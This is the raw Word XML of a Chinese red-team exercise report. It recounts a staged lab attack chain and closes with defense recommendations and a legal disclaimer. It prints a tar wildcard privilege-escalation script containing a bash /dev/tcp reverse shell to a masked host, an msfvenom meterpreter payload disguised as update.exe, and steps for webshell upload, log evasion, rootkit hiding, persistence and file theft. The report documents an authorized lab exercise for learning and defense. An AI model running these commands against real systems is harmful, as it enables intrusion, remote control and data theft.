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62777">
      <w:pPr>
        <w:jc w:val="center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sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="none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sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>攻防实战演练与分析报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0149B1C8">
      <w:pP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</w:rPr>
        <w:t>报告编号： ATTACK-CHAIN-202</w:t>
      </w:r>
      <w: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</w:rPr>
        <w:t>-0</w:t>
      </w:r>
      <w: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</w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w: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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C620C3D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15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5"/>
          <w:szCs w:val="15"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>测试目标： 自建Kali Linux靶机 (模拟高价值服务器)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF65929">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15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5"/>
          <w:szCs w:val="15"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>攻击来源： Windows 11 攻击机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E12EFA0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15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5"/>
          <w:szCs w:val="15"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>测试人员： 我</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAE2A06">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15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5"/>
          <w:szCs w:val="15"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>测试周期： 2025年12月-2026年 1月</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2C4E7F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15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2"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>测试性质： 本地授权下的红队演练</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43742D51">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="56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一、 核心发现与攻击链总览</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E33A1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本次演练成功模拟了针对一台Linux服务器的多阶段、组合式攻击。攻击者（我）从外部网络发起，通过Web应用漏洞爆破、验证逻辑绕过获取初始权限，随后利用 “杀毒软件对抗-权限提升-横向移动-持久化” 的组合技完全控制目标，并最终实施隐蔽的域渗透与数据窃取。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB26F0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整个过程体现了完整的 ATT&amp;CK攻击链 思维，重点验证了在有基础防护（WAF/AV） 环境下，通过社会工程与多漏洞链式利用达成目标的可行性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129F7B4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二、 攻击环境与战术目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2FA40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角色 系统/工具配置 IP地址 战术角色</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5320551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攻击者 (C2) Windows 11 + VMware IPx.x.x.x 命令控制中心</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDACA6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跳板机 Kali Linux (NAT) IPx.x.x.x 载荷投递、扫描、横向移动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6186A2D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核心靶标 Kali Linux (桥接) IPx.x.x.x 模拟高价值Linux服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE7988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内部靶机 Windows 10 (桥接) IPx.x.x.x 模拟内网办公机器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E16B02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战术目标：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32426E0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初始访问：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突破靶标Web防火墙（WAF），获取Shell。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD570C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权限提升：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在靶标主机上从www-data提权至root。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBAA39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防御规避：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绕过或禁用主机安全软件（模拟）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA3A0A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横向移动：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从Linux靶标攻入内网Windows主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF83D3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指挥控制：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建立隐蔽、稳定的C2通道。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE09F7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 数据窃取：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窃取模拟的敏感配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A1D6F4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三、 完整攻击(演练）链技术复盘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04160727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阶段一：外部侦察与初始访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF8E3C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1.1 信息收集 (侦察)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238FCA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被动侦察： 使用 theHarvester 对目标域名进行子域名和邮箱枚举，发现测试后台 admin.demo.com。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D37A8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· 主动扫描： 使用 Nmap 进行隐蔽扫描 (-sS -T2)，发现目标 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IPx.x.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A9BAD6">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto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开放 22 (SSH), 80xx (HTTP), 44xx (HTTPS) 端口。-sV 探测到Web服务器为 Nginx 1.18。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C34F44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1.2 Web渗透 (初始访问)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E16CF6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漏洞发现： 访问 https://test.demo.com/login，发现其为自定义登录系统，存在图形验证码和短信验证码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E0C6D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绕过验证码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4573F47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图形验证码： 使用Burp Suite的 Repeater 模块测试，发现验证码在响应包中明文返回 ("captcha": "3781")，可直接复用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683353F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短信验证码： 同样在Burp Suite中，通过 Intruder 模块对验证码接口进行重放攻击，发现该验证码未与手机号或会话绑定，可被无限次重放使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5998B55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密码爆破：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18935D3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在绕过双重验证码后，使用Burp Suite Intruder 对用户名和密码字段进行 “集束炸弹” (Cluster bomb) 模式攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7D015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用户名字典基于前期收集的邮箱生成，密码字典使用 rockyou.txt 精简版。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541DCF8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结果： 成功爆破出有效凭证：admin / admin@123。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA94478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1.3 获取立足点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0327307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登录后台后，发现一处“系统配置上传”功能，仅允许上传 .xml 文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1446351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利用： 使用Burp Suite抓包，将文件名改为 shell.xml.php，内容为混淆过的PHP WebShell代码。服务器未做严格解析，成功上传并可通过 https://test.demo.com/uploads/shell.xml.php?cmd=whoami 访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FED34D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获得反Shell： 通过WebShell执行 (不好意思这个版本不公开），在跳板机上用 nc -lvp 4444 成功获得一个 www-data 权限的交互式Shell。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F2960E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阶段二：权限提升与防御规避</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CEC20A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2.1 权限提升 (Linux靶机)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34181AB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信息收集： 执行 sudo -l，发现用户 www-data 可以以 root 身份无密码运行 /usr/bin/python3 /opt/scripts/backup.py。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CE18A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漏洞利用： 检查 backup.py 脚本，发现其内部调用 os.system(“tar -czf /backups/*”)，且使用了通配符 *。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F321E7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利用通配符注入： 创建恶意文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE07F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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0294B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cd /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C851AB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echo “#!/bin/bash” &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E9939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echo “/bin/bash -c ‘bash -i &gt;&amp; /dev/tcp/x.x.x.x/5xx5 0&gt;&amp;1’” &gt;&gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA94C7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chmod +x shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60873D9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touch /tmp/--checkpoint=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D15C1B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touch /tmp/--checkpoint-action=exec=sh\shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085AE1F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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1505C1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萝莉体 第二版" w:hAnsi="萝莉体 第二版" w:eastAsia="萝莉体 第二版" w:cs="萝莉体 第二版"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="75BD42" w:themeColor="accent4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4"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="萝莉体 第二版" w:hAnsi="萝莉体 第二版" w:eastAsia="萝莉体 第二版" w:cs="萝莉体 第二版"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="75BD42" w:themeColor="accent4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4"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>实际操作有所出入，请勿模仿！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074BC67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触发提权： 执行 sudo /usr/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="E54C5E" w:themeColor="accent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请注意存储路径</w:t>
      </w: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/opt/scripts/backup.py（，成功在跳板机 5555 端口获得一个 root 权限的Shell。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EEA7CC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2.2 防御规避 (模拟行为)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646F8C3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禁用历史记录：</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> export HISTFILE=/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE830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隐藏进程： 将后门进程重命名为 [kworker/0:0] 等系统进程名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF4F88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安装某Rootkit (演示)： 通过 git 下载并编译开源Rootkit 的某Dia工具，动态隐藏指定进程、文件和端口。（此操作用于验证技术可行性，完成后已立即卸载）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8444E2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阶段三：横向移动与持久化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730DBDFF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3.1 内网信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EACBD7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在Linux靶机上执行 ifconfig 和 arp -a，发现内网段 x.x.x.x/24，并定位到主机 x.x.x.x。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F5BAB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使用 sshpass 尝试对发现的SSH密钥进行密码喷洒攻击，未果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F82CA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3.2 横向移动至Windows靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA870F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生成Windows载荷： 在Windows攻击机上使用MSF生成免杀载荷：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5ECE2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2137D56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FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>msfvenom -p windows/x64/meterpreter/reverse_https LHOST=x.x.x.x LPORT=4x43 -f exe -o update.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697BA666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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3B553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社会工程投递： 利用已控的Linux靶机，向内网 x.x.x.x 的开放共享 \\x.x.x.x\Public 上传伪装成 update.exe 的载荷，并通过 net use 命令触发执行（模拟）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4036071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建立C2通道： 在Windows攻击机上启动MSF监听，成功收到来自 x.x.x.x 的Meterpreter会话，权限为 NT AUTHORITY\SYSTEM。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4021747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3.3 权限维持与后渗透</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5466E77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Windows持久化： 通过Meterpreter的 persistence 模块，创建计划任务，每10分钟连接一次C2以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="E54C5E" w:themeColor="accent6"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent6"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>开机自启动</w:t>
      </w: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6720C0B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Linux持久化： 在Linux靶机上，创建一个修改 ~/.ssh/authorized_keys 的后门SSH密钥，并配置 systemd 服务实现持久化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8D2A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· 数据窃取 (模拟)： 在Windows靶机上使用 search -f *.config 查找配置文件，并通过 download 命令将 C:\App\xxx.config 窃取至攻击机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644ABD98">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="60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30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>四、 攻击技术总结与防御建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695FACE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攻击阶段 利用技术 暴露的安全问题 防御建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B75680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初始访问 1. 验证码逻辑缺陷 (重放) 2. 弱口令爆破 3. 文件上传过滤不严 1. 业务逻辑安全缺失 2. 无账号锁定与强口令策略 3. WAF规则不全或未生效 1. 验证码应一次一验、绑定会话 2. 强制多因素认证（MFA） 3. 文件上传执行白名单+随机重命名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC96A3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权限提升 1. Sudo配置不当 (通配符注入) 1. 权限配置过度，未遵循最小化原则 2. 代码审计缺失，未对输入消毒 1. 定期审计 sudo -l 和SUID文件 2. 在脚本中避免使用通配符，或严格限制路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F5562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防御规避 1. 进程伪装 2. Rootkit安装 1. 主机无有效的EDR/AV监控 2. 对系统调用和模块加载无基线监控 1. 部署具备行为检测能力的EDR 2. 启用Linux内核模块签名与审计</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA0C28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横向移动 1. 弱口令/密码喷洒 2. 社会工程+网络共享滥用 1. 内网缺乏分段隔离 2. 共享权限配置不当 1. 网络微隔离，最小化信任域 2. 禁用不必要的共享，强制网络访问控制 (NAC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E0C57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指挥控制 1. HTTPS/HTTP over SSL隧道 1. 缺乏对出站流量的深度检测 1. 部署NGFW，解密并检测SSL流量中的异常 2. 建立网络流量基线，监控异常外连</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE0A0C0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="560" w:firstLineChars="200"/>
        <w:jc w:val="both"/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五、 结论与能力映射</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C45BE9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本次演练展示了一套完整的 “外部渗透-提权-横向移动-持久化” 攻击链。我的核心能力体现在：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C408F3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深度漏洞利用能力：不仅利用常规漏洞（如文件上传），更能发现并利用业务逻辑漏洞（验证码重放）和配置漏洞（sudo通配符注入），实现精准打击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4505440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立体化攻击思维：熟练结合 Web渗透、社会工程、内网横向、持久化控制 等多种手段，形成攻击闭环。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B17DD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强大的工程实践能力：能熟练使用 Burp Suite、MSF、系统命令 等工具链完成从侦察到控制的全部流程，并具备一定的免杀与隐蔽意识。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A8657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报告所展现的攻击者视角、系统性思维及技术深度，正是高级安全工程师、渗透测试工程师及红队研究员所必备的核心素养。我能够将此次演练中获得的经验，逆向应用于威胁狩猎、漏洞挖掘、安全防护体系建设等防御性工作中，实现真正的“以攻促防”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066F27EE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仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋" w:cs="仿宋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</w:p>
    <w:p w14:paraId="0D885634">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="562" w:firstLineChars="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋" w:cs="仿宋"/>
          <w:b/>
          <w:bCs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  <w:t>法律与道德声明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A5C0F9">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="562" w:firstLineChars="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋" w:cs="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="7DDFD7" w:themeColor="accent5" w:themeTint="99"/>
          <w:kern w:val="2"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA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仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋" w:cs="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>本报告中所述的所有攻击行为，均在作者完全可控的本地虚拟化环境中进行，所有目标主机均为自行搭建的测试系统，未对任何非授权目标进行任何形式的测试或攻击。本文档仅用于技术研究、能力证明与安全防御思路探讨，请勿用于非法用途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萝莉体 第二版">
    <w:panose1 w:val="02000500000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="910003FF" w:usb1="59FFFFFF" w:usb2="00000037" w:usb3="00000000" w:csb0="6017019F" w:csb1="DFF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6F03AD"/>
    <w:rsid w:val="2EC86744"/>
    <w:rsid w:val="45ED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2488</Words>
  <Characters>3745</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>13</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4087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2026-01-15T11:27:00Z</dcterms:created>
  <dc:creator>asus</dc:creator>
  <cp:lastModifiedBy>௸྄ིོུ.</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-16T05:31:44Z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eyJoZGlkIjoiMjllNjg5MGZiNzcxY2Y5YTc5ZTk0Mjc3ZWQxMTJlMTciLCJ1c2VySWQiOiIxMTcyMzg0NjA2In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>377F6DAF8B224BBDA52254BEF64A3A07_12</vt:lpwstr>
  </property>
</Properties>
</file>